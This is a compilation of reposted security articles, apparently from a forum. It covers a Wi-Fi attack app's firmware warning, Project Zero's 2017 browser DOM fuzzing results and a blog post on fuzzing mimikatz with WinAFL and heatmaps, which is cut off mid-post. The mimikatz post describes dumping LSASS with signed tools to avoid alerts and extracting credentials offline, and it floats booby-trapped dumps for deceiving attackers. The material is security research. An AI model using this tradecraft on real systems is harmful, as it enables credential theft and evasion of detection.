The app gives you the option to install the nexmon firmware on your device. Even though the app performs a chipset check, you have the option to override it, if you believe that your device has the BCM4339 wireless adapter. However, installing a custom firmware intended for BCM4339 on a different chipset can possibly damage your device (and I mean hardware, not something that is fixable with factory reset). I am not responsible for any damage caused to your device by this software. Consider yourself warned.

Donate

If you like my work, you can buy me a beer.

Sursa: https://github.com/chrisk44/Hijacker
-
Thursday, September 21, 2017

The Great DOM Fuzz-off of 2017

Posted by Ivan Fratric, Project Zero

Introduction

Historically, DOM engines have been one of the largest sources of web browser bugs. And while in recent years the popularity of those kinds of bugs in targeted attacks has somewhat fallen in favor of Flash (which allows for cross-browser exploits) and JavaScript engine bugs (which often result in very powerful exploitation primitives), they are far from gone. For example, CVE-2016-9079 (a bug that was used in November 2016 against Tor Browser users) was a bug in Firefox's DOM implementation, specifically the part that handles SVG elements in a web page. It is also a rare case that a vendor will publish a security update that doesn't contain fixes for at least several DOM engine bugs.

An interesting property of many of those bugs is that they are more or less easy to find by fuzzing. This is why a lot of security researchers as well as browser vendors who care about security invest in building DOM fuzzers and associated infrastructure. As a result, after joining Project Zero, one of my first projects was to test the current state of resilience of major web browsers against DOM fuzzing.

The fuzzer

For this project I wanted to write a new fuzzer which takes some of the ideas from my previous DOM fuzzing projects, but also improves on them and implements new features. Starting from scratch also allowed me to end up with cleaner code that I'm open-sourcing together with this blog post. The goal was not to create anything groundbreaking - as already noted by security researchers, many DOM fuzzers have begun to look like each other over time. Instead the goal was to create a fuzzer that has decent initial coverage, is easily understandable and extendible and can be reused by myself as well as other researchers for fuzzing other targets besides just DOM fuzzing. We named this new fuzzer Domato (credits to Tavis for suggesting the name).

Like most DOM fuzzers, Domato is generative, meaning that the fuzzer generates a sample from scratch given a set of grammars that describes HTML/CSS structure as well as various JavaScript objects, properties and functions.

The fuzzer consists of several parts:

- The base engine that can generate a sample given an input grammar. This part is intentionally fairly generic and can be applied to other problems besides just DOM fuzzing.
- The main script that parses the arguments and uses the base engine to create samples. Most logic that is DOM specific is captured in this part.
- A set of grammars for generating HTML, CSS and JavaScript code.

One of the most difficult aspects in generation-based fuzzing is creating a grammar or another structure that describes the samples that are going to be created. In the past I experimented with manually created grammars as well as grammars extracted automatically from web browser code. Each of these approaches has advantages and drawbacks, so for this fuzzer I decided to use a hybrid approach:

1. I initially extracted DOM API declarations from .idl files in Google Chrome Source.
2. Similarly, I parsed Chrome's layout tests to extract common (and not so common) names and values of various HTML and CSS properties.
3. Afterwards, this automatically extracted data was heavily manually edited to make the generated samples more likely to trigger interesting behavior.
One example of this is functions and properties that take strings as input: just because a DOM property takes a string as an input does not mean that any string would have a meaning in the context of that property. Otherwise, Domato supports features that you'd expect from a DOM fuzzer such as:

- Generating multiple JavaScript functions that can be used as targets for various DOM callbacks and event handlers
- Implicit (through grammar definitions) support for "interesting" APIs (e.g. the Range API) that have historically been prone to bugs

Instead of going into much technical detail here, the reader is referred to the fuzzer code and documentation at https://github.com/google/domato. It is my hope that by open-sourcing the fuzzer I would invite community contributions that would cover the areas I might have missed in the fuzzer or grammar creation.

Setup

We tested 5 browsers with the highest market share: Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge and Apple Safari. We gave each browser approximately 100.000.000 iterations with the fuzzer and recorded the crashes. (If we fuzzed some browsers for longer than 100.000.000 iterations, only the bugs found within this number of iterations were counted in the results.) Running this number of iterations would take too long on a single machine and thus requires fuzzing at scale, but it is still well within the pay range of a determined attacker. For reference, it can be done for about $1k on Google Compute Engine given the smallest possible VM size, preemptable VMs (which I think work well for fuzzing jobs as they don't need to be up all the time) and 10 seconds per run.

Here are additional details of the fuzzing setup for each browser:

- Google Chrome was fuzzed on an internal Chrome Security fuzzing cluster called ClusterFuzz. To fuzz Google Chrome on ClusterFuzz we simply needed to upload the fuzzer and it was run automatically against various Chrome builds.
- Mozilla Firefox was fuzzed on internal Google infrastructure (Linux based). Since Mozilla already offers Firefox ASAN builds for download, we used that as a fuzzing target. Each crash was additionally verified against a release build.
- Internet Explorer 11 was fuzzed on Google Compute Engine running Windows Server 2012 R2 64-bit. Given the lack of an ASAN build, page heap was applied to the iexplore.exe process to make it easier to catch some types of issues.
- Microsoft Edge was the only browser we couldn't easily fuzz on Google infrastructure since Google Compute Engine doesn't support Windows 10 at this time and Windows Server 2016 does not include Microsoft Edge. That's why for fuzzing it we created a virtual cluster of Windows 10 VMs on Microsoft Azure. Same as with Internet Explorer, page heap was applied to the MicrosoftEdgeCP.exe process before fuzzing.
- Instead of fuzzing Safari directly, which would require Apple hardware, we instead used WebKitGTK+ which we could run on internal (Linux-based) infrastructure. We created an ASAN build of the release version of WebKitGTK+. Additionally, each crash was verified against a nightly ASAN WebKit build running on a Mac.

Results

Without further ado, the number of security bugs found in each browser is captured in the table below.
Only security bugs were counted in the results (doing anything else is tricky as some browser vendors fix non-security crashes while some don't) and only bugs affecting the currently released version of the browser at the time of fuzzing were counted (as we don't know if bugs in development version would be caught by internal review and fuzzing process before release).

Vendor     | Browser           | Engine   | Number of Bugs | Project Zero Bug IDs
Google     | Chrome            | Blink    | 2              | 994, 1024
Mozilla    | Firefox           | Gecko    | 4*             | 1130, 1155, 1160, 1185
Microsoft  | Internet Explorer | Trident  | 4              | 1011, 1076, 1118, 1233
Microsoft  | Edge              | EdgeHtml | 6              | 1011, 1254, 1255, 1264, 1301, 1309
Apple      | Safari            | WebKit   | 17             | 999, 1038, 1044, 1080, 1082, 1087, 1090, 1097, 1105, 1114, 1241, 1242, 1243, 1244, 1246, 1249, 1250
Total      |                   |          | 31**           |

*While adding the number of bugs results in 33, 2 of the bugs affected multiple browsers
**The root cause of one of the bugs found in Mozilla Firefox was in the Skia graphics library and not in Mozilla source. However, since the relevant code was contributed by Mozilla engineers, I consider it fair to count here.

As can be seen in the table most browsers did relatively well in the experiment with only a couple of security relevant crashes found. Since the same methodology used to result in a significantly higher number of issues just several years ago, this shows clear progress for most of the web browsers. For most of the browsers the differences are not sufficiently statistically significant to justify saying that one browser's DOM engine is better or worse than another.

However, Apple Safari is a clear outlier in the experiment with a significantly higher number of bugs found. This is especially worrying given attackers' interest in the platform as evidenced by the exploit prices and recent targeted attacks. It is also interesting to compare Safari's results to Chrome's, as until a couple of years ago, they were using the same DOM engine (WebKit). It appears that after the Blink/WebKit split either the number of bugs in Blink got significantly reduced or a significant number of bugs got introduced in the new WebKit code (or both). To attempt to address this discrepancy, I reached out to Apple Security proposing to share the tools and methodology. When one of the Project Zero members decided to transfer to Apple, he contacted me and asked if the offer was still valid. So Apple received a copy of the fuzzer and will hopefully use it to improve WebKit.

It is also interesting to observe the effect of MemGC, a use-after-free mitigation in Internet Explorer and Microsoft Edge. When this mitigation is disabled using the registry flag OverrideMemoryProtectionSetting, a lot more bugs appear. However, Microsoft considers these bugs strongly mitigated by MemGC and I agree with that assessment. Given that IE used to be plagued with use-after-free issues, MemGC is an example of a useful mitigation that results in a clear positive real-world impact. Kudos to Microsoft's team behind it!

When interpreting the results, it is very important to note that they don't necessarily reflect the security of the whole browser and instead focus on just a single component (DOM engine), but one that has historically been a source of many security issues. This experiment does not take into account other aspects such as presence and security of a sandbox, bugs in other components such as scripting engines etc.
I can also not disregard the possibility that, within DOM, my fuzzer is more capable at finding certain types of issues than others, which might have an effect on the overall stats.

Experimenting with coverage-guided DOM fuzzing

Since coverage-guided fuzzing seems to produce very good results in other areas we wanted to combine it with DOM fuzzing. We built an experimental coverage-guided DOM fuzzer and ran it against Internet Explorer. IE was selected as a target both because of the author's familiarity with it and because it is very easy to limit coverage collection to just the DOM component (mshtml.dll). The experimental fuzzer used a modified Domato engine to generate mutations and used a modified WinAFL's DynamoRIO client to measure coverage. The fuzzing flow worked roughly as follows:

1. The fuzzer generates a new set of samples by mutating existing samples in the corpus.
2. The fuzzer spawns an IE process which opens a harness HTML page.
3. The harness HTML page instructs the fuzzer to start measuring coverage and loads one of the samples in an iframe.
4. After the sample executes, it notifies the harness which notifies the fuzzer to stop collecting coverage.
5. The coverage map is examined and if it contains unseen coverage, the corresponding sample is added to the corpus.
6. Go to step 3 until all samples are executed or the IE process crashes.
7. Periodically minimize the corpus using AFL's cmin algorithm.
8. Go to step 1.

The following set of mutations was used to produce new samples from the existing ones:

- Adding new CSS rules
- Adding new properties to the existing CSS rules
- Adding new HTML elements
- Adding new properties to the existing HTML elements
- Adding new JavaScript lines. The new lines would be aware of the existing JavaScript variables and could thus reuse them.

Unfortunately, while we did see a steady increase in the collected coverage over time while running the fuzzer, it did not result in any new crashes (i.e. crashes that would not be discovered using dumb fuzzing). It would appear more investigation is required in order to combine coverage information with DOM fuzzing in a meaningful way.

Conclusion

As stated before, DOM engines have been one of the largest sources of web browser bugs. While this type of bug is far from gone, most browsers show clear progress in this area. The results also highlight the importance of doing continuous security testing as bugs get introduced with new code and a relatively short period of development can significantly deteriorate a product's security posture.

The big question at the end is: Are we now at a stage where it is more worthwhile to look for security bugs manually than via fuzzing? Or do more targeted fuzzers need to be created instead of using generic DOM fuzzers to achieve better results? And if we are not there yet - will we be there soon (hopefully)? The answer certainly depends on the browser and the person in question. Instead of attempting to answer these questions myself, I would like to invite the security community to let us know their thoughts.

Sursa: https://googleprojectzero.blogspot.ro/2017/09/the-great-dom-fuzz-off-of-2017.html
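The generative, grammar-based approach described at the top of this post is easy to picture with a toy example. The sketch below is my own illustration and does not use Domato's actual grammar syntax; it only shows the core idea of recursively expanding symbols into random HTML/CSS fragments:

import random

# Toy grammar: each symbol maps to candidate expansions; <name> tokens
# that name a grammar symbol are expanded recursively.
GRAMMAR = {
    "sample": ["<div style='<cssrule>'><element></div>"],
    "element": ["<span><element></span>", "<b>text</b>", "<i>text</i>"],
    "cssrule": ["color: <color>", "width: <number>px"],
    "color": ["red", "blue", "green"],
    "number": ["0", "1", "65535", "-1"],
}

def generate(symbol="sample", depth=0):
    out = random.choice(GRAMMAR[symbol])
    for name in GRAMMAR:
        token = "<%s>" % name
        while token in out:
            # The depth limit keeps recursive rules like <element> finite
            sub = generate(name, depth + 1) if depth < 8 else ""
            out = out.replace(token, sub, 1)
    return out

print(generate())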
-
HACK THE HACKER – FUZZING MIMIKATZ ON WINDOWS WITH WINAFL & HEATMAPS (0DAY) On 22. Sep In this blogpost, I want to explain two topics from a theoretical and practical point of view: How to fuzz windows binaries with source code available (this part is for developers) and How to deal with big input files (aka heatmap fuzzing) and crash analysis (for security consultants; more technical) Since this blog post got too long and I didn’t want to remove important theory, I marked background knowledge with grey color. Feel free to skip these sections if you are already familiar with this knowledge. If you are only interested in the exploitable mimikatz flaws you can jump to chapter “Practice: Analysis of the identified crashes“. I (René Freingruber from SEC Consult Vulnerability Lab) am going to give a talk at heise devSec (and IT-SECX and DefCamp) about fuzzing binaries for developers and therefore I wanted to test different approaches to fuzz windows applications where source code is available (the audience are most likely developers). To my knowledge there are several blog posts talking about fuzzing Linux applications with AFL or libfuzzer (just compile the application with afl-gcc instead of gcc or add some flags to clang), but there is no blog post explaining the concept and setup for Windows. This blog post tries to fill this gap. Fuzzing is a very important concept during development and therefore all developers should know how to do it correctly and that such a setup can be simple and fast! WHY I CHOSE MIMIKATZ AS FUZZING TARGET To demonstrate fuzzing I had to find a good target where source code is available. At the same time, I wanted to learn more about the internals of the application by reading the source code. Therefore, my decision fell on mimikatz because it’s an extremely useful tool for security consultants (and hackers) and I always wanted to understand how mimikatz internally works. Mimikatz is a powerful hacker tool for Windows which can be used to extract plaintext credentials, hashes of currently logged on users, machine certificates and many other things. Moreover, mimikatz contains over 261 000 lines of code, must parse many different data structures and is therefore likely to be affected by vulnerabilities itself. At this point I also want to say that penetration testing would not be the same without the amazing work of Benjamin Delpy gentilkiwi, the author of mimikatz. The next thing I need is a good attack vector. Why should I search for vulnerabilities if there is no real attack vector which can trigger the vulnerability? Mimikatz can be used to dump cleartext credentials and hashes of currently logged in users from the LSASS process. But if there exists a bug in the parsing code of mimikatz, what exactly could I achieve with this? I could just exploit myself because mimikatz gets executed on the same system. Well, not always. As it turns out, well-educated security consultants and hackers do not directly invoke mimikatz on the owned system. Instead, it’s nowadays widespread practice to create a minidump of the LSASS process on the owned system, download it and invoke mimikatz locally (on the attacker system). Why do we do this? Because dropping mimikatz on the owned system could trigger all kind of alerts (AntiVirus, Application Whitelisting, Windows Logs, …) and because we want to stay under the radar, we don’t want these alerts. Instead, we can use Microsoft signed binaries to dump the LSASS process (e.g.: Task manager, procdump.exe, msbuild.exe or sqldumper.exe). 
Now we have a good attack vector! We can create a honeypot, inject some malicious stuff into our own LSASS process, wait until a hacker owns it, dumps the LSASS process and invokes mimikatz on his own system with our manipulated memory dump file – and watch the reverse shells coming in! This and similar attack vectors can be interesting features in the future for deception technologies such as CyberTrap (https://www.cybertrap.com/).

To be fair, exploiting this scenario can be quite difficult because mimikatz is compiled with protections such as ASLR and DEP, and exploitation of such a client-side application is extremely challenging (we have neither the luxury of a remote memory leak nor of scripting possibilities as with browsers or PDF readers). However, such client-side scriptless exploits are not impossible, for example see https://scarybeastsecurity.blogspot.co.at/2016/11/0day-exploit-advancing-exploitation.html. To my surprise, mimikatz contained a very powerful vulnerability which allows us to bypass ASLR (and DEP).

THEORY: FUZZING WINDOWS BINARIES

We don't want to write a mimikatz-specific fuzzer (with knowledge about the parsing structures, implemented checks and so on); instead, we want to use something called "coverage-guided fuzzing" (or feedback-based fuzzing). This means we want to extract code coverage information during fuzzing. If one of our mutated input files (the memory dump files) generates more code coverage in mimikatz, we want to add it to our fuzzing queue and fuzz this input later as well. That means we start with one dump file and the fuzzer identifies different code paths itself (ideally all) for us and therefore "learns" all the internal parsing logic autonomously! This also means that we only have to write a fuzzer once and can use it against nearly all kinds of applications!

Luckily for us, we don't even have to write such a fuzzer because someone else already did an excellent job! Currently the most commonly used fuzzer is called AFL (American fuzzy lop) and implements exactly this idea. It turned out that AFL is extremely effective in identifying vulnerabilities. In my opinion, this is because of four major characteristics of AFL:

1. It is extremely fast.
2. It extracts edge coverage (with hit count) and not only code coverage, which – simplified – means that we try to maximize executed "paths" and not "code" (e.g. if we have an IF statement, code coverage would put the input file which executes the code inside the IF into the queue; edge coverage, on the other hand, would put one entry with, and one entry without the IF body-code into the queue).
3. Because of 1) it can implement deterministic mutation (do every operation on every byte/bit of the input). More on this later when talking about heatmap fuzzing.
4. It's extremely simple to use. Fuzzing can be started within several minutes!

The big question now is: how does AFL extract the code/edge coverage information? The answer depends on the configured mode of AFL. The default option is to "hack" the object files generated by gcc and insert instrumentation code at all possible code locations. There is also an LLVM mode where an LLVM compiler pass is used to insert the instrumentation. And then there is a qemu mode for when source code is not available, which emulates the binary and adds instrumentation via qemu. There are several forks which extend AFL with other instrumentation possibilities. For example, hardware features can also be used to extract code coverage (WinAFL-IntelPT, kAFL).
Another idea is to use dynamic instrumentation frameworks such as PIN or DynamoRio (e.g. WinAFL). These frameworks can dynamically instrument the target binary at runtime, which means that a dispatcher loads the next instructions to be executed and adds additional instrumentation code before (and after) them. All that requires dynamic relocation of the instructions while being completely transparent to the target application. This is quite complicated, but the framework hides all that logic from the user. Obviously, this approach is not fast (but it works on Windows and has many cool features for the future!).

Since source code is available, I thought there should be a possibility similar to what AFL does on Linux (with gcc). My first attempt was to use libfuzzer on Windows. Libfuzzer is a fuzzer like AFL, but it fuzzes at function level and is therefore more suitable for developers. AFL fuzzes full binaries by default but can also be started in a persistent mode where it fuzzes at function level. Libfuzzer uses the "source-based code coverage" feature of the LLVM clang compiler, which is exactly what I wanted to use for coverage information on Windows. After some initial errors I could compile mimikatz with LLVM on Windows. When adding the flags for source-based code coverage I again got some errors, which can be fixed by adding the required libraries to the linker include paths. However, this flag added the same functions to all object files, which resulted in linker errors. The only way I could solve this was to merge all .c files into one huge file. Since this approach was more a pain than anything else, I didn't pursue it further for the talk. Note that using LLVM for application analysis on Windows could be a very interesting approach in the future!

The next thing I tested was WinAFL in syzygy mode, and this was exactly what I was looking for! For a more detailed description of syzygy see https://doar-e.github.io/blog/2017/08/05/binary-rewriting-with-syzygy/. At this point I want to thank Ivan Fratric (developer of WinAFL) and Axel "0vercl0k" Souchet (developer of the syzygy mode) for their amazing job, and of course Michal Zalewski for AFL!

PRACTICE: FUZZING WINDOWS BINARIES

You can download WinAFL from here: https://github.com/ivanfratric/winafl

All we must do is include the header, add the code

    while (__afl_persistent_loop()) {
        // code to fuzz
    }

to the project which we want to fuzz, and compile a 32-bit application with the /PROFILE linker flag (Visual Studio -> project properties -> Linker -> Advanced -> Profile). For mimikatz I removed the command prompt code from the wmain function (inside mimikatz.c) and just called kuhl_m_sekurlsa_all(argc, argv), because I wanted to directly dump the hashes/passwords from the minidump (i.e. issue the sekurlsa::logonpasswords command at program invocation). Since mimikatz would by default extract this information from the LSASS process, I added a line inside kuhl_m_sekurlsa_all() to load the dump instead. Moreover, I added the persistent loop inside this function. Here is how my new kuhl_m_sekurlsa_all() function looks:

    NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t *argv[])
    {
        while (__afl_persistent_loop())
        {
            kuhl_m_sekurlsa_reset();        // sekurlsa::minidump command
            pMinidumpName = argv[1];        // sekurlsa::minidump command
            kuhl_m_sekurlsa_getLogonData(lsassPackages, ARRAYSIZE(lsassPackages)); // sekurlsa::logonpasswords command
        }
        return STATUS_SUCCESS;
    }

Hint: Do not use the above code during fuzzing.
I added a subtle flaw, which I'm going to explain later. Can you already spot it?

After compilation, we can start the binary and see some additional messages. The next step is to instrument the code. For this to work we must register msdia140.dll. This can be done via the command:

    Regsvr32 C:\path\to\msdia140.dll

Then we can call the downloaded instrument.exe binary with the generated mimikatz.exe and mimikatz.pdb file to add the instrumentation. We can start the instrumented binary and see the adapted status message. Now we can generate a minidump file for mimikatz (on a Windows 7 x86 test system I used Task Manager to dump the LSASS process), put it into the input directory and start fuzzing. As we can see, we have a file size problem!

THEORY: FUZZING AND THE INPUT FILE SIZE PROBLEM

We can see that AFL restricts input files to a maximum size of 1 MB. Why? Recall that AFL does deterministic fuzzing before switching to random fuzzing for each queue input. That means it performs specific bit and byte flips/additions/removals/… for every (!) byte/bit of the input! This includes several strategies like bitflip 1/1, bitflip 2/1, …, arith 8/8, arith 16/8 and so on. For example, bitflip 1/1 means that AFL flips 1 bit per execution and then walks forward 1 bit to flip the next bit, whereas 2/1 means that 2 bits are flipped and the step length is 1 bit. Arith 16/8 means that the step is 8 bits and that AFL tries to add interesting values to a value treated as a 16-bit integer. And there are several more such deterministic fuzzing strategies. All these strategies have in common that the number of required application executions depends on the file size!

Let's just assume that AFL only (!) does the bitflip 1/1 deterministic strategy. This means we must execute the target application exactly once per bit of the input file. WinAFL does in-memory fuzzing, which means that we don't have to start the application every time, but let's forget this for now so that our discussion does not get too complicated. Let's say that our input binary has a size of 10 kB. That is 81 920 required executions for the deterministic stage (only for bitflip 1/1)! AFL conducts many more deterministic strategies. For AFL on Linux this is not very much; it's not uncommon to get execution speeds of 1000 – 8000 executions / second (because of the fork-server, persistent mode, …) per core. This fast execution speed together with deterministic fuzzing (and edge coverage) made AFL so successful. So, if we have 16 cores, we can easily do this strategy for one input file within a second.

Now let's assume that our input has a size of 1 MB (the AFL limit), which means 8 388 608 required executions for bitflip 1/1, that our target application is a little bit slower because it's bigger and running on Windows (200 exec / sec), and that we just have one core available for fuzzing. Then we need 11,5 hours only to finish bitflip 1/1 for one input entry! Recall that we must conduct this deterministic stage for every new queue entry (every time we identify new coverage, we must do this again! It's not uncommon for the queue to grow to several thousand inputs). And if we consider all the other deterministic operations which must be performed, the situation becomes even worse. And in our case the input (memory dump) has a size of 27 MB! That would be 216 036 224 required executions only for bitflip 1/1.
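To make the above arithmetic easy to reproduce, here is a quick back-of-the-envelope calculation (my own illustration; the exact 27 MB dump size is back-computed from the author's execution count as 216 036 224 / 8 bytes):

    # executions needed for AFL's bitflip 1/1 stage: one run per input bit
    for size_bytes, execs_per_sec in [(10 * 1024, 8000), (1024 * 1024, 200), (216036224 // 8, 200)]:
        runs = size_bytes * 8                      # one bit flip per execution
        hours = runs / execs_per_sec / 3600.0
        print("%10d bytes -> %10d executions -> %7.1f hours" % (size_bytes, runs, hours))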
AFL detects this and directly aborts, because it would just take too long (and AFL would never find vulnerabilities because it's stuck inside deterministic fuzzing). Of course, we can tell AFL to skip deterministic fuzzing, but that would not be very good because we still have to find the special byte/bit flip which triggers the vulnerability. And the likelihood of that in such a big input file is not very high…

Here is a quote from Michal Zalewski (author of AFL) from the perf_tips.txt document:

To illustrate, let's say that you're randomly flipping bits in a file, one bit at a time. Let's assume that if you flip bit #47, you will hit a security bug; flipping any other bit just results in an invalid document. Now, if your starting test case is 100 bytes long, you will have a 71% chance of triggering the bug within the first 1,000 execs – not bad! But if the test case is 1 kB long, the probability that we will randomly hit the right pattern in the same timeframe goes down to 11%. And if it has 10 kB of non-essential cruft, the odds plunge to 1%.

The key learning is that input file size is very important during fuzzing! At least as important as the plain execution speed of the fuzzer! There are tools and scripts shipped with AFL (cmin/tmin) to minimize the number of input files and the file size. However, I don't want to talk about them in this blog post. They shrink files via a fuzzing attempt and, since the problem is NP-hard, they use heuristics. Tmin is also very slow (execution time depends on the file size…) and often leads to problems with files containing offsets (like our dump file) and checksums. Another idea could be to start WinAFL with an empty input file. However, memory dumps are quite complex and I don't want to "waste" time while WinAFL identifies the format. And here is where heatmaps come into play.

PRACTICE: FUZZING AND HEATMAPS

My first attempt to minimize the input file was to read the source code of mimikatz and understand how it finds the important memory regions (containing the plaintext passwords and hashes) in the memory dump. I assumed some kind of pattern search; however, mimikatz parses and uses lots of structures, and I quickly discarded the idea of manually creating a smaller input binary by understanding mimikatz. During fuzzing we also don't want to have to understand the application in order to write a specific fuzzer; instead we want the fuzzer to learn everything itself. If only we could somehow give the fuzzer the same ability to detect the "important input bytes"…

While reading the code I identified something interesting. Mimikatz loads the memory dump via kernel32!MapViewOfFile(). After that it reads nearly all required information from there (sometimes it also copies it via kull_m_minidump_copy, but let's not get too complicated for the moment). If we can log all memory access attempts to this memory region, we can reduce the number of required executions drastically! If mimikatz does not touch a specific memory region, why should we even fuzz the bytes there?

Here is a heat map which I generated based on memory read operations of mimikatz on my 27 MB input file (generated via a plotly Python script): The black area is never read by mimikatz. The brighter the area, the more memory read operations accessed this region. The start of the file is located at the bottom left of the picture. I print 1000 bytes per line (from left to right), then go one line up and print the next 1000 bytes, and so on.
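The plotly script itself is not shown in this copy of the post; a minimal sketch of how such a heatmap can be rendered with a current plotly version (my own reconstruction – it assumes the hit counts were dumped to a plain "offset count" text log, which is an assumption about the log format):

    import plotly.graph_objects as go

    WIDTH = 1000  # bytes per heatmap row, as described above
    hits = {}
    with open("hitcounts.log") as f:              # assumed format: "<offset> <count>" per line
        for line in f:
            off, cnt = line.split()
            hits[int(off, 0)] = int(cnt)

    size = max(hits) + 1
    rows = [[hits.get(y * WIDTH + x, 0) for x in range(WIDTH)]
            for y in range((size + WIDTH - 1) // WIDTH)]   # row 0 = file start, drawn at the bottom

    fig = go.Figure(data=go.Heatmap(z=rows, colorscale="Hot"))
    fig.write_html("heatmap.html")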
At this zoom level, we do not see access attempts to the start (header) of the memory dump. However, this is only because the file size is 27 MB and therefore the smaller red/yellow/white dots are not visible. But we can zoom in.

The most important message from the above pictures: we do not have to fuzz the bytes from the black area! But we can do even better: we can start fuzzing the white bytes (many read attempts, like offset 0xaa00, which gets read several thousand times), then continue with the yellow bytes (e.g. offset 0x08 is read several hundred times) and then the red areas (which are only read 1-5 times). This in itself is not a perfect approach (more read attempts also mean a higher likelihood that the input becomes invalid, so it's maybe not the best idea to start with the white areas; but since we must do the full deterministic step, it basically does not matter with which offsets we start. Hint: a better strategy is to also consider the address of the triggering read instruction together with the hit counts).

You may be wondering how I extracted the memory-read information. For mimikatz I just used a stupid PoC debugger script; however, I'm currently developing a more sophisticated script which uses dynamic instrumentation frameworks and can extract such information from any application. The debugger script approach is "stupid" because it's very slow and does not work for every application. However, for mimikatz it worked fine, because mimikatz reads most of the time from the region which is mapped via MapViewOfFile().

My WinAppDbg script is very simple: I just use the API hooking mechanism of WinAppDbg to hook the post-routine of MapViewOfFile. The return value contains the memory address where the input memory dump is loaded. I placed a memory breakpoint on it, and at every breakpoint hit I just log the relative offset and increment the hit counter. You can also extend this script to become more complex (e.g. hook kull_m_memory_search() or kull_m_minidump_copy()). For reference, here is the script: We start mimikatz via the debugger; as soon as mimikatz finishes (debug.loop() returns), we just sort the offsets based on the hit counts and dump them to a log file. The script hooks MapViewOfFile to obtain the base address of our input in memory, adds the memory breakpoint (watch_buffer() method) and invokes memory_breakpoint_callback every time an instruction reads from our input. Hint: WinAppDbg has a bug inside watch_buffer() which does not return the bw variable. If the script should be extended (e.g. to disable the memory breakpoint for search functions), the WinAppDbg source must be modified to return the "bw" variable in the watch_buffer() function. All that's left is the callback function: I used capstone to disassemble the triggering instruction to obtain the size of the read operation, so that the offsets are updated correctly.

As you can see, there is no magic involved and the script is really simple (at least this one, which only works with mimikatz). The downside of the debugger memory breakpoint approach is that it is extremely slow. On my test system, this script takes approximately 30 minutes to execute mimikatz once, which is really slow (mimikatz without the script executes in under 1 second). However, we only have to do this once. Another downside is that it does not work for all applications, because applications typically copy input bytes to other buffers and access them there.
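The script listings were embedded as images in the original post and are missing here; based on the description above, a reconstruction could look roughly like this (a sketch only, not the author's exact code: WinAppDbg is a Python 2 library, the dump size and paths are placeholders, and the capstone-based read-width handling is simplified away – each faulting read is counted once):

    from collections import defaultdict
    from winappdbg import Debug, EventHandler

    DUMP_SIZE = 27 * 1024 * 1024      # placeholder: size of the mapped minidump
    hits = defaultdict(int)           # relative offset -> read count
    view = []                         # base address returned by MapViewOfFile

    def memory_breakpoint_callback(event):
        # the original script disassembled the faulting instruction with capstone
        # to learn the read width; here we simply count one hit per faulting address
        hits[event.get_fault_address() - view[0]] += 1

    class Hooks(EventHandler):
        apiHooks = {"kernel32.dll": [("MapViewOfFile", 5)]}

        def post_MapViewOfFile(self, event, retval):
            view.append(retval)
            # memory breakpoint over the whole mapped input dump
            event.debug.watch_buffer(event.get_pid(), retval, DUMP_SIZE,
                                     action=memory_breakpoint_callback)

    debug = Debug(Hooks(), bKillOnExit=True)
    debug.execv([r"mimikatz.exe", r"C:\fuzz\lsass.dmp"])
    debug.loop()                      # returns once mimikatz exits

    with open("hitcounts.log", "w") as f:
        for off, cnt in sorted(hits.items(), key=lambda kv: -kv[1]):
            f.write("0x%x %d\n" % (off, cnt))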
A more general approach is to write such a script with a dynamic instrumentation framework, which is also much faster (and is what I'm currently working on). Developing such a script is much harder, because we have to use shadow memory for taint tracking and follow copies of tainted memory (this taint propagation is a complex part because it requires a correct semantic understanding of the x86 instruction set), while at the same time storing which byte depends on which input byte. All of this should be as fast as possible (for fuzzing) and must not consume too much memory (so that it's usable for big and complex applications like Adobe Reader or web browsers). Please note that there are some similar solutions, most notably TaintScope (however, no source code or tool is publicly available and it was just a PoC) or VUzzer (based on DataTracker/libdft, which themselves are based on PIN); some other frameworks such as Triton (based on PIN) or Panda (based on Qemu) can also do taint analysis. The problem with these tools is that either the source code and the tool are not publicly available, or they are very slow, or they do not work on Windows, or they do not propagate the file offset information (they just mark data as tainted or not tainted), or they are written with PIN, which itself is slower than DynamoRio. I'm developing my own tool here to fulfill the above-mentioned conditions so that it is useful during fuzzing (works on Windows and Linux, is as fast as possible and does not consume too much memory for huge applications). Please also bear in mind that AFL ships with tmin, which also tries to reduce the input file size. However, it does this via a fuzzing approach which is very slow (and can't handle checksums and file offsets so well).

We can also verify that the black bytes don't matter by just removing them (zeroing them out) from the input file: The above figure shows that the output of both files is exactly the same, therefore the black bytes really don't matter. Now we can start fuzzing with a much smaller input file – only 91 KB instead of 27 MB!

PRACTICE: FUZZING RESULTS / READING THE AFL STATUS SCREEN

I started with a simple fuzzer (not WinAFL), because I first had to modify the WinAFL code to fuzz only the identified bytes. I recommend starting fuzzing as soon as possible with a simple fuzzer and, while it is running, working on a better version of the fuzzer. My first fuzzer was a 50 LoC Python script which flipped bytes, invoked mimikatz over WinDbg and parsed the output to detect crashes. I started 8 parallel fuzzing jobs with this fuzzer on my 12-core home system (4 cores were reserved for private stuff). Three days later I had 28 unique crashes identified by WinDbg. My analysis scripts reduced them to 4 unique bugs in code (the 28 crashes are just variations of the same 4 bugs in the code). Execution speed was approximately 2 exec/sec per job, therefore 16 exec/sec in total on all cores (which is really slow). The first exploitable bug from the next chapter was found after 3 hours; the second exploitable bug was not found at all with this approach.

I also modified WinAFL to fuzz only the heatmap bytes. My first approach was to use the "post_handler", which can be used for test case post-processing (e.g. fixing checksums; however, it's better to remove the checksum verification code from the target application). Since this handler is not called for dry runs (the first executions of AFL), this does not work. Instead, write_to_testcase() can be modified. Inside the main function I copy the full memory dump to a heap buffer.
In the input directory I stored a file containing only the heatmap bytes, so the file size is much smaller, like 91 KB or 3 KB. Next I added code to write_to_testcase() which copies all bytes from the input file over the heap buffer at the correct positions. Therefore, AFL only sees the small files but passes the correct memory dumps to mimikatz. This approach has a little drawback though: as soon as one queue entry has a different size, fuzzing could become ineffective, but for this PoC it was good enough. Later I'm going to invoke the heatmap calculation for every queue entry if a heuristic detects this to be more efficient. Please also bear in mind that AFL and WinAFL write every testcase to disk. This means we have to write a 27 MB file per execution (also per in-memory execution like a simple bit flip!!). From a performance perspective it would be much better to modify the testcase inside the target application in-memory (we already do in-memory fuzzing and therefore this is possible). Then we could also skip all the process switches from WinAFL to the target application and back, and then we would really get the benefit of in-memory fuzzing! We can do this by injecting the AFL code (or even Python code…) into the target application, an area on which I'm also currently working.

Here is a screenshot of my WinAFL output (running on a RAM disk): Look at the different stats of the fuzzer. What do you see? Is this type of fuzzing good or not? Should we stop or continue? Here is the same screenshot with some colored boxes:

